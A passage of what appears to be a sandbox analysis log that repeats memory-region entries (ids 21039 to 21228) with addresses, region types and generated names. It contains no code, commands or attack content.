0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21049 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21050 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21053 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21077 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21078 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21081 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21082 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21087 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21096 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21097 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21098 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21099 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21173 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21174 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21175 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21176 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21190 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21191 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21194 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21195 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21198 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21199 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21207 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21208 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21211 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21212 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21214 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21215 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21219 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21220 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21221 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21222 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 